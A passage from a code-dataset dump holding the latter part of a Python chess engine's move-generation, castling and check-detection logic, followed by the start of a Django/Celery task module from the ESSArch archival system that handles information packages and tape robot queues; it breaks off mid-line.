7\r\n enemy = \"w\"\r\n\r\n if self.enPassantPossible:\r\n for p in self.enPassantPawns:\r\n if p[0] == row and p[1] == col:\r\n self.enPassant(row, col, moves)\r\n\r\n if self.board[row + moveDirection][col] == \"--\":\r\n if not piecePinned or pinDirection == (moveDirection, 0):\r\n if row + moveDirection == backRow:\r\n moves.append(Move((row, col), (row + moveDirection, col), self.board, pawnPromotion=True))\r\n else:\r\n moves.append(Move((row, col), (row + moveDirection, col), self.board))\r\n if row == startRow and self.board[row + 2 * moveDirection][col] == \"--\":\r\n if 0 <= col - 1 < 8 and 0 <= col + 1 < 8:\r\n if self.board[row + 2 * moveDirection][col - 1][0] == enemy or self.board[row + 2 * moveDirection][col + 1][0] == enemy:\r\n moves.append(Move((row, col), (row + 2 * moveDirection, col), self.board, doublePawnMove=True))\r\n if self.board[row + 2 * moveDirection][col - 1][0] == enemy and self.board[row + 2 * moveDirection][col + 1][0] == enemy:\r\n self.doubleEnPassant = True\r\n else:\r\n moves.append(Move((row, col), (row + 2 * moveDirection, col), self.board))\r\n elif col == 0:\r\n if self.board[row + 2 * moveDirection][col + 1][0] == enemy:\r\n moves.append(Move((row, col), (row + 2 * moveDirection, col), self.board, doublePawnMove=True))\r\n self.pawnMoved = (row + 2 * moveDirection, col)\r\n else:\r\n moves.append(Move((row, col), (row + 2 * moveDirection, col), self.board))\r\n elif col == 7:\r\n if self.board[row + 2 * moveDirection][col - 1][0] == enemy:\r\n moves.append(Move((row, col), (row + 2 * moveDirection, col), self.board, doublePawnMove=True))\r\n self.pawnMoved = (row + 2 * moveDirection, col)\r\n else:\r\n moves.append(Move((row, col), (row + 2 * moveDirection, col), self.board))\r\n if col - 1 >= 0:\r\n if not piecePinned or pinDirection == (moveDirection, -1):\r\n if self.board[row + moveDirection][col - 1][0] == enemy:\r\n if row + moveDirection == backRow:\r\n moves.append(Move((row, col), (row + moveDirection, col - 1), self.board, pawnPromotion=True))\r\n else:\r\n moves.append(Move((row, col), (row + moveDirection, col - 1), self.board))\r\n if col + 1 <= 7:\r\n if not piecePinned or pinDirection == (moveDirection, 1):\r\n if self.board[row + moveDirection][col + 1][0] == enemy:\r\n if row + moveDirection == backRow:\r\n moves.append(Move((row, col), (row + moveDirection, col + 1), self.board, pawnPromotion=True))\r\n else:\r\n moves.append(Move((row, col), (row + moveDirection, col + 1), self.board))\r\n\r\n def enPassant(self, row, col, moves):\r\n if self.whiteToMove:\r\n moves.append(Move((row, col), (self.pawnMoved[0]-1, self.pawnMoved[1]), self.board, enPassant=True))\r\n else:\r\n moves.append(Move((row, col), (self.pawnMoved[0]+1, self.pawnMoved[1]), self.board, enPassant=True))\r\n if self.doubleEnPassant:\r\n self.enPassantPossible = True\r\n self.doubleEnPassant = False\r\n else:\r\n self.enPassantPossible = False\r\n\r\n def getKnightMoves(self, row, col, moves):\r\n piecePinned = False\r\n pinDirection = ()\r\n for i in range(len(self.pins) - 1, -1, -1):\r\n if self.pins[i][0] == row and self.pins[i][1] == col:\r\n piecePinned = True\r\n pinDirection = (self.pins[i][2], self.pins[i][3])\r\n self.pins.remove(self.pins[i])\r\n break\r\n knightMoves = ((-2, -1), (-2, 1), (-1, -2), (-1, 2), (1, -2), (1, 2), (2, -1), (2, 1))\r\n ally = \"w\" if self.whiteToMove else \"b\"\r\n for k in knightMoves:\r\n newRow = row + k[0]\r\n newCol = col + k[1]\r\n if 0 <= newRow < 8 and 0 <= newCol < 8:\r\n if not piecePinned:\r\n newPiece = self.board[newRow][newCol]\r\n if newPiece[0] != ally:\r\n moves.append(Move((row, col), (newRow, newCol), self.board))\r\n\r\n def getBishopMoves(self, row, col, moves):\r\n piecePinned = False\r\n pinDirection = ()\r\n for i in range(len(self.pins) - 1, -1, -1):\r\n if self.pins[i][0] == row and self.pins[i][1] == col:\r\n piecePinned = True\r\n pinDirection = (self.pins[i][2], self.pins[i][3])\r\n self.pins.remove(self.pins[i])\r\n break\r\n bishopMoves = ((-1, -1), (-1, 1), (1, -1), (1, 1))\r\n ally = \"w\" if self.whiteToMove else \"b\"\r\n for b in bishopMoves:\r\n for i in range(1, 8):\r\n newRow = row + b[0] * i\r\n newCol = col + b[1] * i\r\n if 0 <= newRow < 8 and 0 <= newCol < 8:\r\n if not piecePinned or pinDirection == b or pinDirection == (-b[0], -b[1]):\r\n newPiece = self.board[newRow][newCol]\r\n if newPiece == \"--\":\r\n moves.append(Move((row, col), (newRow, newCol), self.board))\r\n elif newPiece[0] != ally:\r\n moves.append(Move((row, col), (newRow, newCol), self.board))\r\n break\r\n else:\r\n break\r\n else:\r\n break\r\n\r\n def getRookMoves(self, row, col, moves):\r\n piecePinned = False\r\n pinDirection = ()\r\n for i in range(len(self.pins) - 1, -1, -1):\r\n if self.pins[i][0] == row and self.pins[i][1] == col:\r\n piecePinned = True\r\n pinDirection = (self.pins[i][2], self.pins[i][3])\r\n if self.board[row][col][1] != \"Q\":\r\n self.pins.remove(self.pins[i])\r\n break\r\n rookMoves = ((-1, 0), (0, -1), (1, 0), (0, 1))\r\n ally = \"w\" if self.whiteToMove else \"b\"\r\n for r in rookMoves:\r\n for i in range(1, 8):\r\n newRow = row + r[0] * i\r\n newCol = col + r[1] * i\r\n if 0 <= newRow < 8 and 0 <= newCol < 8:\r\n if not piecePinned or pinDirection == r or pinDirection == (-r[0], -r[1]):\r\n newPiece = self.board[newRow][newCol]\r\n if newPiece == \"--\":\r\n moves.append(Move((row, col), (newRow, newCol), self.board))\r\n elif newPiece[0] != ally:\r\n moves.append(Move((row, col), (newRow, newCol), self.board))\r\n break\r\n else:\r\n break\r\n else:\r\n break\r\n\r\n def getQueenMoves(self, row, col, moves):\r\n self.getRookMoves(row, col, moves)\r\n self.getBishopMoves(row, col, moves)\r\n\r\n def getKingMoves(self, row, col, moves):\r\n kingMoves = ((-1, -1), (-1, 0), (-1, 1), (0, -1), (0, 1), (1, -1), (1, 0), (1, 1))\r\n ally = \"w\" if self.whiteToMove else \"b\"\r\n for k in kingMoves:\r\n newRow = row + k[0]\r\n newCol = col + k[1]\r\n if 0 <= newRow < 8 and 0 <= newCol < 8:\r\n newPiece = self.board[newRow][newCol]\r\n if newPiece[0] != ally:\r\n # Kings sent to their potential end locations to see if these positions would be valid\r\n if ally == \"w\":\r\n self.wKLocation = (newRow, newCol)\r\n else:\r\n self.bKLocation = (newRow, newCol)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n moves.append(Move((row, col), (newRow, newCol), self.board))\r\n # If the move has not been appended to val3dMoves, the King locations are reset\r\n # Otherwise they remain the same\r\n if ally == \"w\":\r\n self.wKLocation = (row, col)\r\n else:\r\n self.bKLocation = (row, col)\r\n\r\n if not self.inCheck:\r\n self.kingsideCastle(row, col, moves)\r\n self.queensideCastle(row, col, moves)\r\n\r\n def kingsideCastle(self, row, col, moves):\r\n oldKingLocation = self.wKLocation if self.whiteToMove else self.bKLocation\r\n if self.whiteToMove:\r\n if self.whiteKingsideCastle:\r\n if self.board[7][5] == \"--\" and self.board[7][6] == \"--\":\r\n self.wKLocation = (7, 5)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.wKLocation = (7, 6)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.wKLocation = (7, 7)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.wKLocation = oldKingLocation\r\n moves.append(Move((row, col), (7, 6), self.board, castle=True))\r\n else:\r\n if self.blackKingsideCastle:\r\n if self.board[0][5] == \"--\" and self.board[0][6] == \"--\":\r\n self.bKLocation = (0, 5)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.bKLocation = (0, 6)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.bKLocation = (0, 7)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.bKLocation = oldKingLocation\r\n moves.append(Move((row, col), (0, 6), self.board, castle=True))\r\n\r\n def queensideCastle(self, row, col, moves):\r\n oldKingLocation = self.wKLocation if self.whiteToMove else self.bKLocation\r\n if self.whiteToMove:\r\n if self.whiteQueensideCastle:\r\n if self.board[7][1] == \"--\" and self.board[7][2] == \"--\" and self.board[7][3] == \"--\":\r\n self.wKLocation = (7, 0)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.wKLocation = (7, 1)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.wKLocation = (7, 2)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.wKLocation = (7, 3)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.wKLocation = oldKingLocation\r\n moves.append(Move((row, col), (7, 2), self.board, castle=True))\r\n else:\r\n if self.blackQueensideCastle:\r\n if self.board[0][1] == \"--\" and self.board[0][2] == \"--\" and self.board[0][3] == \"--\":\r\n self.bKLocation = (0, 0)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.bKLocation = (0, 1)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.bKLocation = (0, 2)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.bKLocation = (0, 3)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.bKLocation = oldKingLocation\r\n moves.append(Move((row, col), (0, 2), self.board, castle=True))\r\n\r\n def inCheck(self):\r\n if self.whiteToMove:\r\n return self.underAttack(self.wKLocation[0], self.wKLocation[1])\r\n else:\r\n return self.underAttack(self.bKLocation[0], self.bKLocation[1])\r\n\r\n def underAttack(self, row, col):\r\n self.whiteToMove = not self.whiteToMove\r\n allEnemyMoves = self.allMoves()\r\n self.whiteToMove = not self.whiteToMove\r\n for move in allEnemyMoves:\r\n if move.newRow == row and move.newCol == col:\r\n return True\r\n return False\r\n\r\n def allMoves(self):\r\n moves = []\r\n for row in range(len(self.board)):\r\n for col in range(len(self.board[row])):\r\n turn = self.board[row][col][0]\r\n if (turn == \"w\" and self.whiteToMove) or (turn == \"b\" and not self.whiteToMove):\r\n piece = self.board[row][col][1]\r\n self.getPieceMoves[piece](row, col, moves)\r\n return moves\r\n\r\n def validMoves(self):\r\n moves = []\r\n self.inCheck, self.pins, self.checks = self.pinsAndChecks()\r\n if self.whiteToMove:\r\n kingRow = self.wKLocation[0]\r\n kingCol = self.wKLocation[1]\r\n else:\r\n kingRow = self.bKLocation[0]\r\n kingCol = self.bKLocation[1]\r\n if self.inCheck:\r\n if len(self.checks) == 1:\r\n moves = self.allMoves()\r\n check = self.checks[0]\r\n checkRow = check[0]\r\n checkCol = check[1]\r\n pieceChecking = self.board[checkRow][checkCol]\r\n validSquares = []\r\n if pieceChecking[1] == \"N\":\r\n validSquares = [(checkRow, checkCol)]\r\n else:\r\n for i in range(1, 8):\r\n validSquare = (kingRow + check[2] * i, kingCol + check[3] * i)\r\n validSquares.append(validSquare)\r\n if validSquare[0] == checkRow and validSquare[1] == checkCol:\r\n break\r\n for i in range(len(moves) - 1, -1, -1):\r\n if moves[i].pieceMoved[1] != \"K\":\r\n if not (moves[i].newRow, moves[i].newCol) in validSquares:\r\n moves.remove(moves[i])\r\n else:\r\n self.getKingMoves(kingRow, kingCol, moves)\r\n else:\r\n moves = self.allMoves()\r\n\r\n if len(moves) == 0:\r\n if self.inCheck:\r\n self.checkmate = True\r\n else:\r\n self.stalemate = True\r\n else:\r\n self.checkmate = False\r\n self.stalemate = False\r\n\r\n return moves\r\n\r\n def pinsAndChecks(self):\r\n pins = []\r\n checks = []\r\n inCheck = False\r\n if self.whiteToMove:\r\n enemy = \"b\"\r\n ally = \"w\"\r\n startRow = self.wKLocation[0]\r\n startCol = self.wKLocation[1]\r\n else:\r\n enemy = \"w\"\r\n ally = \"b\"\r\n startRow = self.bKLocation[0]\r\n startCol = self.bKLocation[1]\r\n directions = ((-1, 0), (0, -1), (1, 0), (0, 1), (-1, -1), (-1, 1), (1, -1), (1, 1))\r\n for j in range(len(directions)):\r\n d = directions[j]\r\n possiblePin = ()\r\n for i in range(1, 8):\r\n newRow = startRow + d[0] * i\r\n newCol = startCol + d[1] * i\r\n if 0 <= newRow < 8 and 0 <= newCol < 8:\r\n newPiece = self.board[newRow][newCol]\r\n if newPiece[0] == ally and newPiece[1] != \"K\":\r\n if possiblePin == ():\r\n possiblePin = (newRow, newCol, d[0], d[1])\r\n else:\r\n break\r\n elif newPiece[0] == enemy:\r\n type = newPiece[1]\r\n if (0 <= j <= 3 and type == \"R\") or \\\r\n (4 <= j <= 7 and type == \"B\") or \\\r\n (i == 1 and type == \"p\" and ((enemy == \"w\" and 6 <= j <= 7) or (\r\n enemy == \"b\" and 4 <= j <= 5))) or \\\r\n (type == \"Q\") or (i == 1 and type == \"K\"):\r\n if possiblePin == ():\r\n inCheck = True\r\n checks.append((newRow, newCol, d[0], d[1]))\r\n break\r\n else:\r\n pins.append(possiblePin)\r\n break\r\n else:\r\n break\r\n else:\r\n break\r\n knightMoves = ((-2, -1), (-2, 1), (-1, -2), (-1, 2), (1, -2), (1, 2), (2, -1), (2, 1))\r\n for k in knightMoves:\r\n newRow = startRow + k[0]\r\n newCol = startCol + k[1]\r\n if 0 <= newRow < 8 and 0 <= newCol < 8:\r\n newPiece = self.board[newRow][newCol]\r\n if newPiece[0] == enemy and newPiece[1] == \"N\":\r\n inCheck = True\r\n checks.append((newRow, newCol, k[0], k[1]))\r\n return inCheck, pins, checks\r\n\r\n def makeMove(self, move):\r\n self.board[move.newRow][move.newCol] = move.pieceMoved\r\n self.board[move.startRow][move.startCol] = \"--\"\r\n self.moveLog.append(move)\r\n self.whiteToMove = not self.whiteToMove\r\n if move.pieceMoved == \"wK\":\r\n self.wKLocation = (move.newRow, move.newCol)\r\n self.whiteKingsideCastle = False\r\n self.whiteQueensideCastle = False\r\n elif move.pieceMoved == \"bK\":\r\n self.bKLocation = (move.newRow, move.newCol)\r\n self.blackKingsideCastle = False\r\n self.blackQueensideCastle = False\r\n if move.pieceMoved == \"wR\" and move.startCol == 0:\r\n self.whiteQueensideCastle = False\r\n elif move.pieceMoved == \"wR\" and move.startCol == 7:\r\n self.whiteKingsideCastle = False\r\n elif move.pieceMoved == \"bR\" and move.startCol == 0:\r\n self.blackQueensideCastle = False\r\n elif move.pieceMoved == \"bR\" and move.startCol == 7:\r\n self.blackKingsideCastle = False\r\n if move.pawnPromotion:\r\n promotedPiece = \"Q\"\r\n #promotedPiece = input(\"Q, B, R or N?\")\r\n self.board[move.newRow][move.newCol] = move.pieceMoved[0] + promotedPiece\r\n if move.doublePawnMove:\r\n self.enPassantPossible = True\r\n self.pawnMoved = (move.newRow, move.newCol)\r\n self.enPassantPawns = ((move.newRow, move.newCol - 1), (move.newRow, move.newCol + 1))\r\n if move.enPassant:\r\n self.board[move.startRow][move.newCol] = \"--\"\r\n if move.castle:\r\n if not self.whiteToMove:\r\n if move.newRow == 7 and move.newCol == 6:\r\n self.board[7][7] = \"--\"\r\n self.board[7][5] = \"wR\"\r\n elif move.newRow == 7 and move.newCol == 2:\r\n self.board[7][0] = \"--\"\r\n self.board[7][3] = \"wR\"\r\n else:\r\n if move.newRow == 0 and move.newCol == 6:\r\n self.board[0][7] = \"--\"\r\n self.board[0][5] = \"bR\"\r\n elif move.newRow == 0 and move.newCol == 2:\r\n self.board[0][0] = \"--\"\r\n self.board[0][3] = \"bR\"\r\n if not move.capture:\r\n self.sinceCapture += 1\r\n else:\r\n self.sinceCapture = 0\r\n if not move.pieceMoved[1] == \"p\":\r\n self.sincePawnMoved += 1\r\n else:\r\n self.sincePawnMoved = 0\r\n\r\n def undoMove(self):\r\n if len(self.moveLog) != 0:\r\n move = self.moveLog.pop()\r\n self.board[move.startRow][move.startCol] = move.pieceMoved\r\n self.board[move.newRow][move.newCol] = move.pieceCaptured\r\n self.whiteToMove = not self.whiteToMove\r\n if move.pieceMoved == \"wK\":\r\n self.wKLocation = (move.startRow, move.startCol)\r\n self.whiteKingsideCastle = False\r\n self.whiteQueensideCastle = False\r\n elif move.pieceMoved == \"bK\":\r\n self.bKLocation = (move.startRow, move.startCol)\r\n if move.enPassant:\r\n self.board[move.newRow][move.newCol] = \"--\"\r\n self.board[move.startRow][move.newCol] = move.pieceCaptured\r\n if move.castle:\r\n if move.newCol - move.startCol == 2:\r\n self.board[move.newRow][move.newCol + 1] = self.board[move.newRow][move.newCol - 1]\r\n self.board[move.newRow][move.newCol - 1] = \"--\"\r\n else:\r\n self.board[move.newRow][move.newCol - 2] = self.board[move.newRow][move.newCol + 1]\r\n self.board[move.newRow][move.newCol + 1] = \"--\"\r\n self.checkmate = False\r\n self.stalemate = False\r\n\r\n\r\nclass Move():\r\n ranksToRows = {\"1\": 7, \"2\": 6, \"3\": 5, \"4\": 4,\r\n \"5\": 3, \"6\": 2, \"7\": 1, \"8\": 0}\r\n rowsToRanks = {v: k for k, v in ranksToRows.items()}\r\n filesToCols = {\"a\": 0, \"b\": 1, \"c\": 2, \"d\": 3,\r\n \"e\": 4, \"f\": 5, \"g\": 6, \"h\": 7}\r\n colsToFiles = {v: k for k, v in filesToCols.items()}\r\n\r\n def __init__(self, startSquare, newSquare, board, pawnPromotion=False, enPassant=False, doublePawnMove=False, castle=True):\r\n self.startRow = startSquare[0]\r\n self.startCol = startSquare[1]\r\n self.newRow = newSquare[0]\r\n self.newCol = newSquare[1]\r\n self.pieceMoved = board[self.startRow][self.startCol]\r\n self.pieceCaptured = board[self.newRow][self.newCol]\r\n self.capture = self.pieceCaptured != \"--\"\r\n self.pawnPromotion = pawnPromotion\r\n self.enPassant = enPassant\r\n if enPassant:\r\n self.pieceCaptured = \"bp\" if self.pieceMoved == \"wp\" else \"wp\"\r\n self.doublePawnMove = doublePawnMove\r\n self.castle = castle\r\n self.moveID = self.startRow * 1000 + self.startCol * 100 + self.newRow * 10 + self.newCol\r\n\r\n def __eq__(self, other):\r\n if isinstance(other, Move):\r\n return self.moveID == other.moveID\r\n return False\r\n\r\n def toFileRank(self, row, col):\r\n return self.colsToFiles[col] + self.rowsToRanks[row]\r\n\r\n def getChessNotation(self):\r\n return self.toFileRank(self.startRow, self.startCol) + self.toFileRank(self.newRow, self.newCol)\r\n","repo_name":"mattphillips00/Chess-Endgames","sub_path":"engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":25436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6876150067","text":"import datetime\nimport errno\nimport logging\nimport os\nimport pathlib\nimport shutil\nimport tarfile\nimport tempfile\nimport zipfile\n\nfrom celery import states as celery_states\nfrom celery.exceptions import Ignore\nfrom celery.result import allow_join_result\nfrom crontab import CronTab\nfrom django.contrib.auth import get_user_model\nfrom django.db import transaction\nfrom django.db.models import F\nfrom django.utils import timezone\n\n# noinspection PyUnresolvedReferences\nfrom ESSArch_Core import tasks # noqa\nfrom ESSArch_Core.auth.models import Notification\nfrom ESSArch_Core.configuration.models import Path\nfrom ESSArch_Core.essxml.util import parse_mets\nfrom ESSArch_Core.fixity.checksum import calculate_checksum\nfrom ESSArch_Core.ip.models import (\n MESSAGE_DIGEST_ALGORITHM_CHOICES_DICT,\n InformationPackage,\n Workarea,\n)\nfrom ESSArch_Core.maintenance.models import (\n AppraisalJob,\n AppraisalRule,\n ConversionJob,\n ConversionRule,\n)\nfrom ESSArch_Core.storage.exceptions import (\n TapeDriveLockedError,\n TapeMountedAndLockedByOtherError,\n TapeMountedError,\n TapeUnmountedError,\n)\nfrom ESSArch_Core.storage.models import (\n Robot,\n RobotQueue,\n StorageObject,\n TapeDrive,\n)\nfrom ESSArch_Core.util import (\n creation_date,\n delete_path,\n find_destination,\n open_file,\n timestamp_to_datetime,\n)\nfrom ESSArch_Core.WorkflowEngine.dbtask import DBTask\nfrom ESSArch_Core.WorkflowEngine.models import ProcessTask\n\nUser = get_user_model()\nlogger = logging.getLogger('essarch')\n\n\nclass ReceiveSIP(DBTask):\n logger = logging.getLogger('essarch.workflow.tasks.ReceiveSIP')\n event_type = 20100\n\n @transaction.atomic\n def run(self, purpose=None, delete_sip=False):\n self.logger.debug('Receiving SIP')\n aip = InformationPackage.objects.get(pk=self.ip)\n algorithm = aip.get_checksum_algorithm()\n container = aip.object_path\n objid, container_type = os.path.splitext(os.path.basename(container))\n container_type = container_type.lower()\n xml = aip.package_mets_path\n aip.package_mets_create_date = timestamp_to_datetime(creation_date(xml)).isoformat()\n aip.package_mets_size = os.path.getsize(xml)\n aip.package_mets_digest_algorithm = MESSAGE_DIGEST_ALGORITHM_CHOICES_DICT[algorithm.upper()]\n aip.package_mets_digest = calculate_checksum(xml, algorithm=algorithm)\n aip.generation = 0\n aic = InformationPackage.objects.create(package_type=InformationPackage.AIC, responsible=aip.responsible,\n label=aip.label, start_date=aip.start_date, end_date=aip.end_date)\n old_sip_path = aip.object_path\n aip.aic = aic\n aip_dir = os.path.join(aip.policy.ingest_path.value, objid)\n aip.object_path = aip_dir\n try:\n os.makedirs(aip_dir)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n\n aip.save()\n\n dst_path, dst_name = find_destination('sip', aip.get_profile('aip').structure, aip.object_path)\n if dst_path is None:\n dst_path, dst_name = find_destination('content', aip.get_profile('aip').structure, aip.object_path)\n\n dst_name, = self.parse_params(dst_name)\n dst = os.path.join(dst_path, dst_name)\n\n sip_profile = aip.submission_agreement.profile_sip\n\n try:\n shutil.rmtree(dst)\n except FileNotFoundError:\n pass\n\n if aip.policy.receive_extract_sip:\n temp = Path.objects.cached('entity', 'temp', 'value')\n with tempfile.TemporaryDirectory(dir=temp) as tmpdir:\n self.logger.debug('Extracting {} to {}'.format(container, tmpdir))\n if container_type == '.tar':\n with tarfile.open(container) as tar:\n root_member_name = tar.getnames()[0]\n tar.extractall(tmpdir)\n elif container_type == '.zip':\n with zipfile.ZipFile(container) as zipf:\n root_member_name = zipf.namelist()[0]\n zipf.extractall(tmpdir)\n else:\n raise ValueError('Invalid container type: {}'.format(container))\n\n dst = os.path.join(dst, '')\n try:\n os.makedirs(dst)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n\n tmpsrc = tmpdir\n if len(os.listdir(tmpdir)) == 1 and os.listdir(tmpdir)[0] == root_member_name:\n new_tmpsrc = os.path.join(tmpdir, root_member_name)\n if os.path.isdir(new_tmpsrc):\n tmpsrc = new_tmpsrc\n\n self.logger.debug('Moving content of {} to {}'.format(tmpsrc, dst))\n\n for f in os.listdir(tmpsrc):\n shutil.move(os.path.join(tmpsrc, f), dst)\n\n self.logger.debug('Deleting {}'.format(tmpdir))\n\n aip.sip_path = os.path.relpath(dst, aip.object_path)\n else:\n self.logger.debug('Copying {} to {}'.format(container, dst))\n shutil.copy2(container, dst)\n aip.sip_path = os.path.relpath(os.path.join(dst, os.path.basename(container)), aip.object_path)\n\n sip_mets_dir, sip_mets_file = find_destination('mets_file', sip_profile.structure, aip.sip_path)\n if os.path.isfile(aip.sip_path):\n sip_mets_data = parse_mets(\n open_file(\n os.path.join(aip.object_path, sip_mets_dir, sip_mets_file),\n container=aip.sip_path,\n container_prefix=aip.object_identifier_value,\n )\n )\n else:\n sip_mets_data = parse_mets(open_file(os.path.join(aip.object_path, sip_mets_dir, sip_mets_file)))\n\n # prefix all SIP data\n sip_mets_data = {f'SIP_{k.upper()}': v for k, v in sip_mets_data.items()}\n\n aip_profile_rel_data = aip.get_profile_rel('aip').data\n aip_profile_rel_data.data.update(sip_mets_data)\n aip_profile_rel_data.save()\n\n if delete_sip:\n delete_path(old_sip_path)\n delete_path(pathlib.Path(old_sip_path).with_suffix('.xml'))\n\n self.logger.debug('sip_path set to {}'.format(aip.sip_path))\n aip.save()\n\n def event_outcome_success(self, result, purpose=None, delete_sip=False):\n return \"Received SIP\"\n\n\nclass ReceiveAIP(DBTask):\n event_type = 30710\n\n def run(self, workarea):\n workarea = Workarea.objects.prefetch_related('ip').get(pk=workarea)\n ip = workarea.ip\n\n ip.state = 'Receiving'\n ip.save(update_fields=['state'])\n\n ingest = ip.policy.ingest_path\n dst = os.path.join(ingest.value, ip.object_identifier_value)\n\n shutil.copytree(ip.object_path, dst)\n\n ip.object_path = dst\n ip.state = 'Received'\n ip.save()\n\n\nclass AccessAIP(DBTask):\n def run(self, aip, storage_object=None, tar=True, extracted=False, new=False, package_xml=False,\n aic_xml=False, object_identifier_value=\"\", dst=None):\n aip = InformationPackage.objects.get(pk=aip)\n responsible = User.objects.get(pk=self.responsible)\n\n # if it is a received IP, i.e. from ingest and not from storage,\n # then we read it directly from disk and move it to the ingest workarea\n if aip.state == 'Received':\n if not extracted and not new:\n raise ValueError('An IP must be extracted when transferred to ingest workarea')\n\n if new:\n # Create new generation of the IP\n\n old_aip = aip.pk\n new_aip = aip.create_new_generation('Ingest Workarea', responsible, object_identifier_value)\n aip = InformationPackage.objects.get(pk=old_aip)\n else:\n new_aip = aip\n\n workarea = Path.objects.get(entity='ingest_workarea').value\n workarea_user = os.path.join(workarea, responsible.username)\n dst_dir = os.path.join(workarea_user, new_aip.object_identifier_value, )\n\n shutil.copytree(aip.object_path, dst_dir)\n\n workarea_obj = Workarea.objects.create(\n ip=new_aip, user_id=self.responsible, type=Workarea.INGEST, read_only=not new\n )\n Notification.objects.create(\n message=\"%s is now in workarea\" % new_aip.object_identifier_value,\n level=logging.INFO, user_id=self.responsible, refresh=True\n )\n\n if new:\n new_aip.object_path = dst_dir\n new_aip.save(update_fields=['object_path'])\n\n return str(workarea_obj.pk)\n\n if storage_object is not None:\n storage_object = StorageObject.objects.get(pk=storage_object)\n else:\n storage_object = aip.get_fastest_readable_storage_object()\n\n aip.access(storage_object, self.get_processtask(), dst=dst)\n\n\nclass PollRobotQueue(DBTask):\n track = False\n\n def run(self):\n force_entries = RobotQueue.objects.filter(\n req_type=30, status__in=[0, 2]\n ).select_related('storage_medium').order_by('-status', 'posted')\n\n non_force_entries = RobotQueue.objects.filter(\n status__in=[0, 2]\n ).exclude(req_type=30).select_related('storage_medium').order_by('-status', '-req_type', 'posted')[:5]\n\n entries = list(force_entries) + list(non_force_entries)\n\n if not len(entries):\n raise Ignore()\n\n for entry in entries:\n entry.status = 2\n entry.save(update_fields=['status'])\n\n medium = entry.storage_medium\n\n if entry.req_type == 10: # mount\n if medium.tape_drive is not None: # already mounted\n if hasattr(entry, 'io_queue_entry'): # mounting for read or write\n if medium.tape_drive.io_queue_entry != entry.io_queue_entry:\n raise TapeMountedAndLockedByOtherError(\n \"Tape already mounted and locked by '%s'\" % medium.tape_drive.io_queue_entry\n )\n\n entry.delete()\n\n raise TapeMountedError(\"Tape already mounted\")\n\n drive = entry.tape_drive\n\n if drive is None:\n free_drive = TapeDrive.objects.filter(\n status=20, storage_medium__isnull=True, io_queue_entry__isnull=True, locked=False,\n ).order_by('num_of_mounts').first()\n\n if free_drive is None:\n raise ValueError('No tape drive available')\n\n drive = free_drive\n\n free_robot = Robot.objects.filter(robot_queue__isnull=True).first()\n\n if free_robot is None:\n raise ValueError('No robot available')\n\n entry.robot = free_robot\n entry.status = 5\n entry.save(update_fields=['robot', 'status'])\n\n with allow_join_result():\n\n try:\n ProcessTask.objects.create(\n name=\"ESSArch_Core.tasks.MountTape\",\n params={\n 'medium': medium.pk,\n 'drive': drive.pk,\n }\n ).run().get()\n except TapeMountedError:\n entry.delete()\n raise\n except BaseException:\n entry.status = 100\n raise\n else:\n medium.tape_drive = drive\n medium.save(update_fields=['tape_drive'])\n entry.delete()\n finally:\n entry.robot = None\n entry.save(update_fields=['robot', 'status'])\n\n elif entry.req_type in [20, 30]: # unmount\n if medium.tape_drive is None: # already unmounted\n entry.delete()\n raise TapeUnmountedError(\"Tape already unmounted\")\n\n if medium.tape_drive.locked:\n if entry.req_type == 20:\n raise TapeDriveLockedError(\"Tape locked\")\n\n free_robot = Robot.objects.filter(robot_queue__isnull=True).first()\n\n if free_robot is None:\n raise ValueError('No robot available')\n\n entry.robot = free_robot\n entry.status = 5\n entry.save(update_fields=['robot', 'status'])\n\n with allow_join_result():\n try:\n ProcessTask.objects.create(\n name=\"ESSArch_Core.tasks.UnmountTape\",\n params={\n 'drive': medium.tape_drive.pk,\n }\n ).run().get()\n except TapeUnmountedError:\n entry.delete()\n raise\n except BaseException:\n entry.status = 100\n raise\n else:\n medium.tape_drive = None\n medium.save(update_fields=['tape_drive'])\n entry.delete()\n finally:\n entry.robot = None\n entry.save(update_fields=['robot', 'status'])\n\n\nclass UnmountIdleDrives(DBTask):\n track = False\n\n def run(self):\n idle_drives = TapeDrive.objects.filter(\n status=20, storage_medium__isnull=False,\n last_change__lte=timezone.now() - F('idle_time'),\n locked=False,\n )\n\n if not idle_drives.exists():\n raise Ignore()\n\n for drive in idle_drives.iterator():\n robot_queue_entry_exists = RobotQueue.objects.filter(\n storage_medium=drive.storage_medium, req_type=20, status__in=[0, 2]\n ).exists()\n if not robot_queue_entry_exists:\n RobotQueue.objects.create(\n user=User.objects.get(username='system'),\n storage_medium=drive.storage_medium,\n req_type=20, status=0,\n )\n\n\nclass ScheduleAppraisalJobs(DBTask):\n track = False\n\n def run(self):\n now = timezone.now()\n\n # get rules without future jobs scheduled\n rules = AppraisalRule.objects.filter(\n information_packages__isnull=False, information_packages__active=True,\n information_packages__appraisal_date__lte=now\n ).exclude(jobs__start_date__gte=now).exclude(frequency__exact='')\n\n for rule in rules.iterator():\n cron_entry = CronTab(rule.frequency)\n\n try:\n latest_job = rule.jobs.latest()\n delay = cron_entry.next(timezone.localtime(latest_job.start_date))\n last = latest_job.start_date\n except 